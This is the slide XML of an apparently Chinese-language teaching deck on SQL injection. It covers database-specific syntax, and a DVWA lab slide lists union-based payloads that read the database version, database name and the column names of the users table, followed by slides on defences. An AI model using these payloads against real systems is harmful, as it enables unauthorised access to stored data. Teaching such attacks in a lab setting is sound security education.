              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1143000" indent="-228600" defTabSz="957263" eaLnBrk="0" hangingPunct="0">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600200" indent="-228600" defTabSz="957263" eaLnBrk="0" hangingPunct="0">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2057400" indent="-228600" defTabSz="957263" eaLnBrk="0" hangingPunct="0">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>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10000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="323433"/>
                </a:solidFill>
                <a:latin typeface="华文新魏" panose="02010800040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文新魏" panose="02010800040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>主讲</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="323433"/>
                </a:solidFill>
                <a:latin typeface="华文新魏" panose="02010800040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文新魏" panose="02010800040101010101" pitchFamily="2" charset="-122"/>
                <a:cs typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="323433"/>
              </a:solidFill>
              <a:latin typeface="华文新魏" panose="02010800040101010101" pitchFamily="2" charset="-122"/>
              <a:ea typeface="华文新魏" panose="02010800040101010101" pitchFamily="2" charset="-122"/>
              <a:cs typeface="Arial Unicode MS" panose="020B0604020202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各个数据库注入方式</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>注释符： </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>--(MSSQL, MySQL), #(MySQL), /*comment*/(MySQL)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>单行用分号隔开，运行多个</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>语句：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>MSSQL</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>判断（</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>IF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>ELSE</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>语句）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>IF(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="1" dirty="0" err="1"/>
              <a:t>condition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="1" dirty="0" err="1"/>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="1" dirty="0" err="1"/>
              <a:t>part</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="1" dirty="0" err="1"/>
              <a:t>false</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>-part</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>SELECT IF(1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>,'true','false')</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>MSSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>IF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>condition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" sz="2000" b="1" i="1" dirty="0" err="1"/>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>-part</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> ELSE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" sz="2000" b="1" i="1" dirty="0" smtClean="0"/>
              <a:t>false-part</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" b="1" i="1" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>IF (1=1) SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>'true' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>ELSE SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>'false'</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Oracle</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>BEGIN IF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>condition</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> THEN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" sz="2000" b="1" i="1" dirty="0" err="1"/>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>-part</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>; ELSE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>false-part</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>; END IF; END</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>BEGIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>IF </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>(1=1) THEN </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>dbms_lock.sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>(3); ELSE </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" err="1"/>
              <a:t>dbms_lock.sleep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0"/>
              <a:t>(0); END IF; END</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1800" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>字符串链接：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>MSSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>+</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Oracle</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>： </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>||</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>更多参考：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>www.netsparker.com</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>/blog/web-security/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>-injection-cheat-sheet/</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="559294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注入例子</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DVWA</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，我们可以进行测试：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>简单注入：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1=1; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t># , </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1=1; # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>判断是否可以被注入</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1' or 1=1; #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 来尝试获取全部账号信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1' union all select 1, 2; #</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 来判断可以获取的参数个数</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>union all select 1,(@@version); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>来获取数据库版本</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1' union all select 1,(database()); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>获取数据库名称</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>1' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>union all select 1, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>group_concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>) from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>='users' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>获取表所有列名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1421304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如何防护</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>为什么会出现</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入漏洞？</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>数据库可以运行系统命令</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>用最小化权限的账户启动数据库</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>进制让数据库执行系统命令</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>连接数据库的用户权限过大</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>WAF</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>等监控是否有异常操作</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>连接数据库的用户权限最小化</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>错误信息返回过多的信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>统一管理错误信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>禁止向用户提供错误信息</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>在服务器未进行过滤</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>过滤所有客户端数据</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>审核数据</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1150809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如何防护</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>注入 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="mr-IN" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> 续</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="内容占位符 3"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1410686" y="981075"/>
            <a:ext cx="9370628" cy="5145088"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1020325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SQL</a:t>
            </a:r>
            <a:r>
